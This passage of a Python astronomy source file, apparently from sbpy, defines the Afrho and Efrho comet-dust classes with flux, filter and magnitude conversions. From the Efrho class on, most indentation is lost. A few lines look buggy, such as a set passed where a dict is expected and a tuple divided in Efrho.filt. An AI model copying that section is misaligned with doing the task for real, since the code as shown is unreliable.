         1.1237e+02, 1.3775e+02, 1.7060e+02, 2.1348e+02,
         2.6973e+02, 3.4359e+02, 4.3989e+02, 5.6292e+02,
         7.1363e+02, 8.8448e+02, 1.0533e+03, 1.1822e+03,
         1.2312e+03])
    try:
        # Prefer cubic-spline interpolation when scipy is available.
        from scipy.interpolate import splrep, splev
        Phi = splev(np.abs(phase), splrep(th, ph))
    except ImportError:
        # Fix: the exception was previously bound to an unused name `e`.
        from astropy.utils.exceptions import AstropyWarning
        from warnings import warn
        warn(AstropyWarning('scipy is not present, using linear interpolation.'))
        Phi = np.interp(np.abs(phase), th, ph)
    # Preserve the caller's shape: arrays in, arrays out; scalars in, float out.
    if np.iterable(phase):
        Phi = np.array(Phi).reshape(np.shape(phase))
    else:
        Phi = float(Phi)
    return Phi
class Afrho(u.SpecificTypeQuantity):
    """
    Coma dust quantity for scattered light.
    ``Afrho`` objects behave like astropy `~astropy.units.Quantity`
    objects with units of length.
    Parameters
    ----------
    value : number, astropy `~astropy.units.Quantity`
        The value(s).
    unit : string, astropy `~Unit`
        The unit of the input value, if ``value`` is a number. If a
        string, it must be parseable by :mod:`~astropy.units` package.
    dtype : `~numpy.dtype`, optional
        See `~astropy.units.Quantity`.
    copy : bool, optional
        See `~astropy.units.Quantity`.
    Notes
    -----
    Afρ is the product of dust albedo, dust filling factor, and
    circular aperture radius. It is nominally a constant for a
    steady-state coma in free expansion. See A'Hearn et al. (1984)
    for details.
    References
    ----------
    A'Hearn et al. 1984, AJ 89, 579-591.
    Examples
    --------
    >>> from sbpy.activity import Afrho
    >>> import astropy.units as u
    >>> print(Afrho(1000 * u.cm))
    1000.0 cm
    """
    # Instances are restricted to length-equivalent units (see u.meter).
    _equivalent_unit = u.meter
    _include_easy_conversion_members = True
    def __new__(cls, value, unit=None, dtype=None, copy=None):
        return super().__new__(cls, value, unit=unit, dtype=dtype, copy=copy)
    @classmethod
    def from_fluxd(cls, wave_or_freq, fluxd, aper, eph, phasecor=False,
                   Phi=None, S=None, unit=None):
        """
        Initialize from flux density.
        Parameters
        ----------
        wave_or_freq : `~astropy.units.Quantity`
            Wavelengths or frequencies of the observation.
        fluxd : `~astropy.units.Quantity`
            Flux density per unit wavelength or frequency.
        aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
            Aperture of the observation as a circular radius (length
            or angular units), or as an `~sbpy.activity.Aperture`.
        eph : dictionary-like or `~sbpy.data.Ephem`
            Ephemerides of the comet, describing heliocentric and
            geocentric distances as a `~astropy.units.Quantity` via
            keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
            required if ``phasecor`` is enabled.
        phasecor : bool, optional
            Scale the result by the phase function ``Phi`` to 0°
            phase.
        Phi : callable, optional
            Phase function, see `~Afrho.to_phase` for details.
        S : `~astropy.units.Quantity`, optional
            Solar flux density at 1 au and ``wave``. If ``None``,
            then the default solar spectrum will be used via
            `~sbpy.spectroscopy.sun.default_sun`.
        Examples
        --------
        >>> from sbpy.activity import Afrho
        >>> import astropy.units as u
        >>> fluxd = 6.730018324465526e-14 * u.W / u.m**2 / u.um
        >>> aper = 1 * u.arcsec
        >>> eph = dict(rh=1.5 * u.au, delta=1.0 * u.au)
        >>> S = 1869 * u.W / u.m**2 / u.um
        >>> afrho = Afrho.from_fluxd(None, fluxd, aper, eph=eph, S=S)
        >>> afrho.cm # doctest: +FLOAT_CMP
        999.9999999999999
        """
        # Afrho is linear in flux density: compute the flux of a 1 cm
        # reference coma, then scale.
        fluxd1cm = Afrho(1 * u.cm).fluxd(wave_or_freq, aper, eph=eph, S=S,
                                         unit=fluxd.unit)
        afrho = Afrho((fluxd / fluxd1cm).decompose() * u.cm)
        if phasecor:
            afrho = afrho.to_phase(0 * u.deg, eph['phase'])
        return afrho
    @classmethod
    def from_filt(cls, bandpass, fluxd, aper, eph, **kwargs):
        """Initialize from filter bandpass and flux density.
        Parameters
        ----------
        bandpass : string or `~synphot.SpectralElement`
            The bandpass for ``fluxd`` as the name of a filter, or a
            transmission spectrum as a `~synphot.SpectralElement`.
            See :ref:`sbpy_spectral_standards` for calibration notes.
        fluxd: `~astropy.units.Quantity`
            Flux density per unit wavelength or frequency.
        aper: `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
            Aperture of the observation as a circular radius(length
            or angular units), or as an `~sbpy.activity.Aperture`.
        eph: dictionary-like or `~sbpy.data.Ephem`
            Ephemerides of the comet, describing heliocentric and
            geocentric distances as `~astropy.units.Quantity` via
            keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
            required if ``phasecor`` is enabled.
        **kwargs
            Additional `~Afrho.from_fluxd` keywords, except ``S``.
        Examples
        --------
        Using `synphot`'s built-in I-band filter:
        >>> import astropy.units as u
        >>> from sbpy.activity import Afrho
        >>> bp = 'cousins_r'
        >>> fluxd = 5.667958103624571e-14 * u.W / u.m**2 / u.um
        >>> aper = 1 * u.arcsec
        >>> eph = dict(rh=1.5 * u.au, delta=1.0 * u.au)
        >>> afrho = Afrho.from_filt(bp, fluxd, aper, eph)
        ... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
        >>> afrho.cm # doctest: +FLOAT_CMP +REMOTE_DATA
        1000.0
        Using Spitzer's IRAC 3.6-μm filter (online):
        >>> from synphot import SpectralElement
        >>> fluxd = 5.286867353823682e-16 * u.W / u.m**2 / u.um
        >>> bp = SpectralElement.from_file('http://irsa.ipac.caltech.edu/data/SPITZER/docs/irac/calibrationfiles/spectralresponse/080924ch1trans_full.txt', wave_unit='um')
        ... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
        >>> afrho = Afrho.from_filt(bp, fluxd, aper, eph)
        ... # doctest: +REMOTE_DATA
        >>> afrho.cm # doctest: +REMOTE_DATA
        1000.0
        Notes
        -----
        Filter names can be found in the `~synphot` `documentation
        <http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
        """
        from ..spectroscopy.sun import default_sun
        sun = default_sun.get()
        # Solar flux density through the same bandpass at 1 au.
        wave, S = sun.filt(bandpass, unit=fluxd.unit)
        return cls.from_fluxd(None, fluxd, aper, eph, S=S, **kwargs)
    @classmethod
    def from_mag(cls, mag, unit, aper, eph, bandpass=None, m_sun=None,
                 verbose=True, **kwargs):
        """Initialize from filter and magnitude.
        Parameters
        ----------
        mag : float
            Apparent magntiude.
        unit: string
            Name of magnitude system: 'vegamag', 'ABmag', or 'STmag'.
            Ignored if ``m_sun`` is defined.
        aper: `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
            Aperture of the observation as a circular radius(length
            or angular units), or as an `~sbpy.activity.Aperture`.
        eph: dictionary-like or `~sbpy.data.Ephem`
            Ephemerides of the comet, describing heliocentric and
            geocentric distances as `~astropy.units.Quantity` via
            keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
            required if ``phasecor`` is enabled.
        bandpass : string or `~synphot.SpectralElement`
            Compute the apparent magnitude of the Sun though this
            bandpass: the name of a `~synphot` filter, or a
            transmission spectrum as a `~synphot.SpectralElement`.
            Ignored if ``m_sun`` is defined. See
            :ref:`sbpy_spectral_standards` for calibration notes.
        m_sun : float
            Use this value for the apparent magnitude of the Sun
            rather than computing it using ``bandpass``. ``m_sun`` is
            assumed to be in the same magnitude system as ``mag``.
        verbose : bool, optional
            If ``True``, print the computed solar magnitude.
        **kwargs
            Additional keyword arguments for `~Afrho.from_fluxd`,
            except ``S``.
        Examples
        --------
        >>> import astropy.units as u
        >>> from sbpy.activity import Afrho
        >>> m = 8.49
        >>> aper = 10000 * u.km
        >>> eph = {'rh': 1.45 * u.au,
        ...        'delta': 0.49 * u.au,
        ...        'phase': 17.8 * u.deg}
        >>> afrho = Afrho.from_mag(m, 'vegamag', aper, eph,
        ...     bandpass='cousins_i', phasecor=True)
        ... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
        >>> afrho.value # doctest: +REMOTE_DATA +FLOAT_CMP
        3423.6675739077887
        Notes
        -----
        Filter names can be found in the `~synphot` `documentation
        <http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
        A discussion of magnitude zero points can be found in the
        `~synphot` `documentation
        <http://synphot.readthedocs.io/en/latest/synphot/units.html#counts-and-magnitudes>`_.
        """
        from ..spectroscopy.sun import default_sun
        from ..spectroscopy.vega import default_vega
        if m_sun is None and bandpass is None:
            raise ValueError('One of `bandpass` or `m_sun` must be provided.')
        # Derive the Sun's apparent magnitude in the requested system.
        if m_sun is None:
            sun = default_sun.get()
            if unit.lower() == 'vegamag':
                fluxd_sun = sun.filt(bandpass, unit='W/(m2 um)')[1]
                vega = default_vega.get()
                fluxd_vega = vega.filt(bandpass, unit='W/(m2 um)')[1]
                m_sun = -2.5 * np.log10(fluxd_sun / fluxd_vega).value
            elif unit.lower() == 'abmag':
                fluxd_sun = sun.filt(bandpass, unit='erg/(s cm2 Hz)')[1]
                m_sun = -2.5 * np.log10(fluxd_sun.value) - 48.60
            elif unit.lower() == 'stmag':
                fluxd_sun = sun.filt(bandpass, unit='erg/(s cm2 AA)')[1]
                m_sun = -2.5 * np.log10(fluxd_sun.value) - 21.10
            else:
                raise ValueError(
                    'Magnitude system must be one of vegamag, abmag, or stmag.')
        if verbose:
            print('Using m_sun = {:.4f}'.format(m_sun))
        # Magnitude difference from the Sun -> flux density relative to the
        # Sun; hence S = 1 below.
        fluxd = u.Quantity(10**(-0.4 * (mag - m_sun)), 'W/(m2 um)')
        S = u.Quantity(1, 'W/(m2 um)')  # fluxd already relative to the Sun
        return cls.from_fluxd(None, fluxd, aper, eph, S=S, **kwargs)
    def fluxd(self, wave_or_freq, aper, eph, phasecor=False, Phi=None,
              S=None, unit='W/(m2 um)'):
        """
        Coma flux density.
        Assumes the small angle approximation.
        Parameters
        ----------
        wave_or_freq : `~astropy.units.Quantity`
            Wavelengths or frequencies of the observation. Ignored if
            `S` is provided.
        aper: `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
            Aperture of the observation as a circular radius(length
            or angular units), or as an sbpy `~sbpy.activity.Aperture`.
        eph: dictionary-like or `~sbpy.data.Ephem`
            Ephemerides of the comet, describing heliocentric and
            geocentric distances as `~astropy.units.Quantity` via
            keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
            required if ``phasecor`` is enabled.
        phasecor: bool, optional
            Scale the result by the phase function ``Phi``, assuming
            ``Afrho`` is quoted for 0° phase.
        Phi : callable, optional
            Phase function, see ``to_phase`` for details.
        S : `~astropy.units.Quantity`, optional
            Solar flux density at 1 au and ``wave``. If ``None``,
            then the default solar spectrum will be used via
            `~sbpy.spectroscopy.sun.default_sun`.
        unit : string or `~astropy.units.Unit`, optional
            The flux density unit for the output, ignored if ``S`` is
            provided.
        Returns
        -------
        fluxd : `~astropy.units.Quantity`
            Spectral flux density.
        Examples
        --------
        >>> from sbpy.activity import Afrho
        >>> import astropy.units as u
        >>> afrho = Afrho(1000, 'cm')
        >>> aper = 1 * u.arcsec
        >>> eph = dict(rh=1.5 * u.au, delta=1.0 * u.au)
        >>> S = 1869 * u.W / u.m**2 / u.um
        >>> fluxd = afrho.fluxd(None, aper, eph=eph, S=S)
        >>> fluxd.value # doctest: +FLOAT_CMP
        6.730018324465526e-14
        """
        from .core import Aperture, rho_as_length
        from ..spectroscopy.sun import default_sun
        from .. import bib
        bib.register('activity.dust.Afrho.fluxd', {
            'model': '1984AJ.....89..579A'})
        # check aperture radius
        if isinstance(aper, Aperture):
            rho = aper.coma_equivalent_radius()
        else:
            rho = aper
        rho = rho_as_length(rho, eph)
        # check solar flux density
        if S is None:
            sun = default_sun.get()
            S = sun(wave_or_freq, unit=unit)
        else:
            if not (S.unit.is_equivalent(u.W / u.m**2 / u.um)
                    or S.unit.is_equivalent(u.W / u.m**2 / u.Hz)):
                raise ValueError(
                    'S must have units of spectral flux density, '
                    'e.g., W/m2/μm or W/m2/Hz')
        if phasecor:
            afrho = self.to_phase(eph['phase'], 0 * u.deg)
        else:
            afrho = self
        # compute
        # F = Afρ ρ S / (4 Δ² rh²); the u.au**2 factor makes rh
        # dimensionless in au, matching S quoted at 1 au.
        fluxd = afrho * rho * S / 4 / eph['delta']**2 * u.au**2 / eph['rh']**2
        return fluxd.to(S.unit)
    def filt(self, bandpass, aper, eph, unit=None, **kwargs):
        """Coma flux density through a filter.
        Parameters
        ----------
        bandpass : string or `~synphot.SpectralElement`
            Compute the coma flux density through this bandpass: the
            name of a `~synphot` filter, or a transmission spectrum as
            a `~synphot.SpectralElement`. See
            :ref:`sbpy_spectral_standards` for calibration notes.
        aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
            Aperture of the observation as a circular radius (length
            or angular units), or as an sbpy `~sbpy.activity.Aperture`
            class.
        eph : dictionary-like or `~sbpy.data.Ephem`
            Ephemerides of the comet, describing heliocentric and
            geocentric distances as `~astropy.units.Quantity` via
            keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
            required if `phasecor` is enabled.
        unit : string or `~astropy.units.Unit`, optional
            The spectral unit for the output.
        **kwargs
            Any other `Afrho.fluxd` keyword argument except ``S``.
        Examples
        --------
        Using `synphot`'s built-in I-band filter:
        >>> import astropy.units as u
        >>> from sbpy.activity import Afrho
        >>> bp = 'cousins_r'
        >>> afrho = Afrho(1000, 'cm')
        >>> aper = 1 * u.arcsec
        >>> eph = dict(rh=1.5 * u.au, delta=1.0 * u.au)
        >>> unit = 'W/(m2 um)'
        >>> fluxd = afrho.filt(bp, aper, eph, unit=unit)
        ... # doctest: +FLOAT_CMP +REMOTE_DATA
        >>> fluxd.value # doctest: +FLOAT_CMP +REMOTE_DATA
        5.66795810362457e-14
        Using Spitzer's IRAC 3.6-μm filter (online):
        >>> from synphot import SpectralElement
        >>> bp = SpectralElement.from_file('http://irsa.ipac.caltech.edu/'
        ...     'data/SPITZER/docs/irac/calibrationfiles/spectralresponse/'
        ...     '080924ch1trans_full.txt', wave_unit='um')
        ... # doctest: +REMOTE_DATA
        >>> fluxd = afrho.filt(bp, aper, eph, unit=unit)
        ... # doctest: +REMOTE_DATA
        >>> fluxd.value # doctest: +REMOTE_DATA
        5.286867353823682e-16
        Returns
        -------
        fluxd : `~astropy.units.Quantity`
            Spectral flux density.
        Notes
        -----
        Filter names can be found in the `synphot` `documentation
        <http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
        """
        from ..spectroscopy.sun import default_sun
        sun = default_sun.get()
        # Solar flux density through the bandpass stands in for S.
        wave, S = sun.filt(bandpass, unit=unit)
        return self.fluxd(None, aper, eph, S=S, unit=unit, **kwargs)
    def mag(self, unit, aper, eph, bandpass=None, m_sun=None, verbose=True,
            **kwargs):
        """Coma apparent magnitude.
        Parameters
        ----------
        unit : string
            Name of magnitude system: 'vegamag', 'ABmag', or 'STmag'.
            Ignored if ``m_sun`` is provided. See
            :ref:`sbpy_spectral_standards` for calibration notes.
        aper : `~astropy.units.Quantity` or `~sbpy.activity.Aperture`
            Aperture of the observation as a circular radius (length
            or angular units), or as an sbpy `~sbpy.activity.Aperture`
            class.
        eph : dictionary-like or `~sbpy.data.Ephem`, optional
            Ephemerides of the comet, describing heliocentric and
            geocentric distances as `~astropy.units.Quantity` via
            keywords ``rh`` and ``delta``.
        bandpass : string or `~synphot.SpectralElement`, optional
            Compute the apparent mangitude of the Sun in this
            bandpass: the name of a `~synphot` filter, or a
            transmission spectrum as a `~synphot.SpectralElement`.
            Ignored if ``m_sun`` is provided. See
            :ref:`sbpy_spectral_standards` for calibration notes.
        m_sun : float, optional
            Use this value for the apparent magnitude of the Sun.
        verbose : bool, optional
            If ``True``, print the computed solar magnitude.
        **kwargs :
            Any other `Afrho.fluxd` keyword argument except ``S``.
        Returns
        -------
        mag : float
        Examples
        --------
        Reverse of Afrho.from_mag test
        >>> import astropy.units as u
        >>> from sbpy.activity import Afrho
        >>> afrho = Afrho(3387.92, u.cm)
        >>> aper = 10000 * u.km
        >>> eph = {'rh': 1.45 * u.au,
        ...        'delta': 0.49 * u.au,
        ...        'phase': 17.8 * u.deg}
        >>> afrho.mag('vegamag', aper, eph, bandpass='cousins_i',
        ...     phasecor=True) # doctest: +REMOTE_DATA +IGNORE_OUTPUT
        8.49 # doctest: +REMOTE_DATA +FLOAT_CMP
        Notes
        -----
        Filter names can be found in the `synphot` `documentation
        <http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
        A discussion of magnitude zero points can be found in the
        `synphot` `documentation
        <http://synphot.readthedocs.io/en/latest/synphot/units.html#counts-and-magnitudes>`_.
        """
        if m_sun is None and bandpass is None:
            raise ValueError('One of `bandpass` or `m_sun` must be provided.')
        # afrho0 is the Afrho value that would produce magnitude 0; the coma
        # magnitude is then -2.5 log10 of the ratio.
        afrho0 = Afrho.from_mag(0, unit, aper, eph, bandpass=bandpass,
                                m_sun=m_sun, verbose=verbose, **kwargs)
        return -2.5 * np.log10(self.cm / afrho0.cm)
    def to_phase(self, to_phase, from_phase, Phi=None):
        """
        Scale Afρ to another phase angle.
        Parameters
        ----------
        to_phase : `~astropy.units.Quantity`
            New target phase angle.
        from_phase : `~astropy.units.Quantity`
            Current target phase angle.
        Phi : callable or `None`
            Phase function, a callable object that takes a single
            parameter, phase angle as a `~astropy.units.Quantity`, and
            returns a scale factor. If ``None``,
            `~phase_HalleyMarcus` is used. The phase function is
            expected to be 1.0 at 0 deg.
        Returns
        -------
        afrho : `~Afrho`
            The scaled Afρ quantity.
        Examples
        --------
        >>> from sbpy.activity import Afrho
        >>> afrho = Afrho(10 * u.cm).to_phase(15 * u.deg, 0 * u.deg)
        >>> afrho.cm # doctest: +FLOAT_CMP
        5.87201
        """
        if Phi is None:
            Phi = phase_HalleyMarcus
        return self * Phi(to_phase) / Phi(from_phase)
class Efrho(u.SpecificTypeQuantity):
"""
Coma dust quantity for thermal emission.
``Efrho`` objects are Astropy `~astropy.units.Quantity`s with
units of length.
Parameters
----------
value : number, astropy `~astropy.units.Quantity`
The value(s).
unit : str, `~astropy.units.Unit`
The unit of the input value, if `value` is a number. If a
string, it must be parseable by :mod:`~astropy.units` package.
dtype : `~numpy.dtype`, optional
See `~astropy.units.Quantity`.
copy : bool, optional
See `~astropy.units.Quantity`.
Notes
-----
εfρ is the product of dust emissivity, dust filling factor, and
circular aperture radius. It is nominally a constant for a
steady-state coma in free expansion, and is the thermal emission
equivalent for the Afρ quanitity. See Kelley et al. (2013) for
details.
References
----------
A'Hearn et al. 1984, AJ 89, 579-591.
Kelley et al. 2013, Icarus 225, 475-494.
Examples
--------
>>> from sbpy.activity import Efrho
>>> import astropy.units as u
>>> print(Efrho(1000 * u.cm))
1000.0 cm
"""
_equivalent_unit = u.meter
_include_easy_conversion_members = True
    def __new__(cls, value, unit=None, dtype=None, copy=None):
        # Pass straight through to Quantity construction; mirrors
        # Afrho.__new__ above.
        return super().__new__(cls, value, unit=unit, dtype=dtype, copy=copy)
    @staticmethod
    def _planck(Tscale, T, eph):
        """Planck function and temperature for dust thermal emission."""
        from synphot import SourceSpectrum
        from synphot.models import BlackBody1D
        if T is None:
            # Default dust temperature: 278 K / sqrt(rh [au]) scaled by Tscale.
            T = Tscale * 278 / np.sqrt(eph['rh'] / u.au) * u.K
        # Does not include the factor of pi:
        return SourceSpectrum(BlackBody1D, temperature=T)
@staticmethod
def _observe_through_filter(bp, B, unit):
from synphot import Observation
from ..spectroscopy.vega import default_vega
obs = Observation(B, bp)
wave = obs.effective_wavelength()
fluxd = obs.effstim(unit)
return wave, fluxd
@classmethod
def from_fluxd(cls, wave_or_freq, fluxd, aper, eph, Tscale=1.1,
T=None, B=None):
"""Initialize from flux density.
Assumes the small angle approximation.
Parameters
----------
wave_or_freq : `~astropy.units.Quantity`
Wavelengths or frequencies of the observation. Ignored if
``B`` is provided.
fluxd : `~astropy.units.Quantity`
Spectral flux density.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an sbpy `~sbpy.activity.Aperture`
class.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``.
Tscale : float, optional
Blackbody temperature scale factor. Ignored if ``T`` or
``B`` is provided.
T : `~astropy.units.Quantity`, optional
Use this temperature for the Planck function. Ignored if
``B`` is provided.
B : `~astropy.units.Quantity`, optional
Use this value for the Planck function (surface brightness
units). Overrides ``T`` and ``Tscale``, ``eph['rh']`` is
ignored.
Examples
--------
>>> from sbpy.activity import Efrho
>>> import astropy.units as u
>>> wave = 15.8 * u.um
>>> fluxd = 6.52 * u.mJy
>>> aper = 11.1 * u.arcsec
>>> eph = {'rh': 4.42 * u.au, 'delta': 4.01 * u.au}
>>> efrho = Efrho.from_fluxd(wave, fluxd, aper, eph=eph)
>>> efrho.cm # doctest: +FLOAT_CMP
120.00836963059808
"""
fluxd1cm = Efrho(1 * u.cm).fluxd(
wave_or_freq, aper, eph=eph, Tscale=Tscale, T=T, B=B,
unit=fluxd.unit)
fluxd1cm = fluxd1cm.to(fluxd.unit, u.spectral_density(wave_or_freq))
return Efrho((fluxd / fluxd1cm).decompose() * u.cm)
@classmethod
def from_filt(cls, bandpass, fluxd, aper, eph, Tscale=1.1, T=None):
"""Initialize from filter bandpass and flux density.
Parameters
----------
bandpass : string or `~synphot.SpectralElement`
The filter bandpass for ``fluxd`` as the name of a filter,
or a transmission spectrum as a
`~synphot.SpectralElement`. See
:ref:`sbpy_spectral_standards` for calibration notes.
fluxd : `~astropy.units.Quantity`
Flux density per unit wavelength or frequency.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an `~sbpy.activity.Aperture`.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
required if ``phasecor`` is enabled.
Tscale : float, optional
Blackbody temperature scale factor. Ignored if ``T`` is
provided.
T : `~astropy.units.Quantity`, optional
Use this temperature for the Planck function.
Examples
--------
Notes
-----
Built-in filter names can be found in the `~synphot` `documentation
<http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
"""
B = cls._observe_through_filter(
bandpass, cls._planck(Tscale, T, eph), fluxd.unit)[1] / u.sr
return cls.from_fluxd(None, fluxd, aper, eph, B=B)
@classmethod
def from_mag(cls, mag, unit, aper, eph, bandpass=None, fluxd0=None,
Tscale=1.1, verbose=True, **kwargs):
"""Initialize from filter and magnitude.
Parameters
----------
mag : float
Apparent magntiude.
unit : string
Name of magnitude system: 'vegamag', 'ABmag', or 'STmag'.
Ignored if ``flux0`` is provided. See
:ref:`sbpy_spectral_standards` for calibration notes.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an `~sbpy.activity.Aperture`.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances.
bandpass : `~synphot.SpectralElement`, optional
The filter bandpass for ``mag``.
fluxd0 : float, optional
Spectral flux density for 0th mag.
**kwargs :
Any other `Efrho.fluxd` keyword argument except ``S``.
Examples
--------
Ficticious 10th mag comet observed through Spitzer/IRS 22-μm
imager:
>>> import astropy.units as u
>>> from synphot import SpectralElement
>>> from sbpy.activity import Efrho
>>> mag = 10.0
>>> bp = SpectralElement.from_file('https://irsa.ipac.caltech.edu/'
... 'data/SPITZER/docs/files/spitzer/redPUtrans.txt', wave_unit='um',
... comment=';') # doctest: +REMOTE_DATA +IGNORE_OUTPUT
>>> aper = 10000 * u.km
>>> eph = {'rh': 1.45 * u.au,
... 'delta': 0.49 * u.au}
>>> efrho = Efrho.from_mag(mag, 'vegamag', aper, eph, bandpass=bp)
... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
>>> efrho.value # doctest: +REMOTE_DATA +FLOAT_CMP
3423.6675739077887
Notes
-----
A discussion of magnitude zero points can be found in the
`~synphot` `documentation
<http://synphot.readthedocs.io/en/latest/synphot/units.html#counts-and-magnitudes>`_.
"""
from ..spectroscopy.vega import default_vega
if bandpass is None and fluxd0 is None:
raise ValueError('One of `bandpass` or `fluxd0` must be provided.')
if fluxd0 is None:
if unit.lower() == 'vegamag':
vega = default_vega.get()
fluxd0 = vega.filt(bandpass, unit='W/(m2 um)')[1]
elif unit.lower() == 'abmag':
fluxd0 = u.Quantity(10**(-0.4 * 48.60), 'erg/(s cm2 Hz)')
elif unit.lower() == 'stmag':
fluxd0 = u.Quantity(10**(-0.4 * 21.10), 'erg/(s cm2 AA)')
else:
raise ValueError(
'Magnitude system must be one of vegamag, abmag, or stmag.')
if verbose:
print('Using fluxd0 = {:.4g}'.format(fluxd0))
fluxd = fluxd0 * 10**(-0.4 * mag)
if kwargs.get('B') is None:
return cls.from_filt(bandpass, fluxd, aper, eph, Tscale=Tscale,
**kwargs)
else:
return cls.from_fluxd(None, fluxd, aper, eph, Tscale=Tscale,
**kwargs)
def fluxd(self, wave_or_freq, aper, eph, Tscale=1.1, T=None, unit=None,
B=None):
"""Coma flux density.
Assumes the small angle approximation.
Parameters
----------
wave_or_freq : `~astropy.units.Quantity`
Wavelengths or frequencies of the observation.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius(length or
angular units), or as an sbpy `~sbpy.activity.Aperture` class.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. ``rh`` is not required
when ``aper`` is in units of length.
Tscale : float, optional
Blackbody temperature scale factor. Ignored if ``T`` or
``B`` is provided.
T : `~astropy.units.Quantity`, optional
Use this temperature for the Planck function. Ignored if
``B`` is provided.
unit : `~astropy.units.Unit` or string, optional
Return quantity with this unit. The default behavior is
to inspect ``wave_or_freq`` and return W / (m2 μm) for
wavelengths, Jy for frequency.
B : `~astropy.units.Quantity`, optional
Use this value for the Planck function (surface brightness
units). Overrides ``T`` and ``Tscale``, ``eph['rh']`` is
ignored.
Returns
-------
fluxd : `~astropy.units.Quantity`
Spectral flux density.
Examples
--------
>>> from sbpy.activity import Efrho
>>> import astropy.units as u
>>> efrho = Efrho(120.0, 'cm')
>>> freq = 15.8 * u.um
>>> aper = 11.1 * u.arcsec
>>> eph = {'rh': 4.42 * u.au, 'delta': 4.01 * u.au}
>>> fluxd = efrho.fluxd(freq, aper, eph=eph, unit='Jy')
>>> fluxd.value # doctest: +FLOAT_CMP
0.006519545281786034
"""
from .core import rho_as_length, Aperture
from .. import bib
bib.register('activity.dust.Efrho.fluxd',
{'model', '2013Icar..225..475K'})
# check aperture radius
if isinstance(aper, Aperture):
rho = aper.coma_equivalent_radius()
else:
rho = aper
rho = rho_as_length(rho, eph)
if unit is None:
# choose unit based on B or spectral unit
if B is not None:
unit = B.unit
elif wave_or_freq.unit.is_equivalent(u.m):
unit = u.Unit('W/(m2 um)')
else:
unit = u.Unit('Jy')
else:
# user's requested unit
unit = u.Unit(unit)
if B is None:
# _planck does not include the factor of pi, but is in flux
# density units
_B = self._planck(Tscale, T, eph)
B = _B(wave_or_freq, flux_unit=unit) / u.sr
fluxd = self * rho / eph['delta']**2 * np.pi * B * u.sr
return fluxd.to(B.unit * u.sr)
def filt(self, bandpass, aper, eph, Tscale=1.1, T=None, B=None,
unit='W/(m2 um)'):
"""Coma flux density through a filter.
Parameters
----------
bandpass : string or `~synphot.SpectralElement`
Compute the coma flux density through this bandpass: the
name of a `~synphot` filter, or a transmission spectrum as
a `~synphot.SpectralElement`. See
:ref:`sbpy_spectral_standards` for calibration notes.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an sbpy `~sbpy.activity.Aperture`
class.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
required if `phasecor` is enabled.
Tscale : float, optional
Blackbody temperature scale factor. Ignored if ``T`` or
``B`` is provided.
T : `~astropy.units.Quantity`, optional
Use this temperature for the Planck function. Ignored if
``B`` is provided.
B : `~astropy.units.Quantity`, optional
Use this value for the Planck function (surface brightness
units). Overrides ``T`` and ``Tscale``, ``eph['rh']`` is
ignored.
unit : string or `~astropy.units.Unit`, optional
The spectral unit for the output.
Examples
--------
Returns
-------
fluxd : `~astropy.units.Quantity`
Spectral flux density.
Notes
-----
Filter names can be found in the `synphot` `documentation
<http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
"""
if B is None:
B = self._observe_through_filter(
bandpass, self._planck(Tscale, T, eph), unit) / u.sr
return self.fluxd(None, aper, eph, B=B)
def mag(self, unit, aper, eph, bandpass=None, fluxd0=None, Tscale=1.1,
**kwargs):
"""Coma apparent magnitude.
Parameters
----------
unit : string
Name of magnitude system: 'vegamag', 'ABmag', or 'STmag'.
Ignored if ``fluxd0`` is provided.
aper : `~astropy.units.Quantity` or `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an sbpy `~sbpy.activity.Aperture`
class.
eph : dictionary-like or `~sbpy.data.Ephem`, optional
Ephemerides of the comet, describing heliocentric and
geocentric distances.
bandpass : string or `~synphot.SpectralElement`, optional
Compute the 0-mag flux density in this bandpass. Provide
either the name of a `~synphot` filter, or a transmission
spectrum. Ignored if ``fluxd0`` is provided.
fluxd0 : float, optional
Spectral flux density for 0th mag.
**kwargs :
Any other `Efrho.fluxd` keyword argument.
Returns
-------
mag : float
Examples
--------
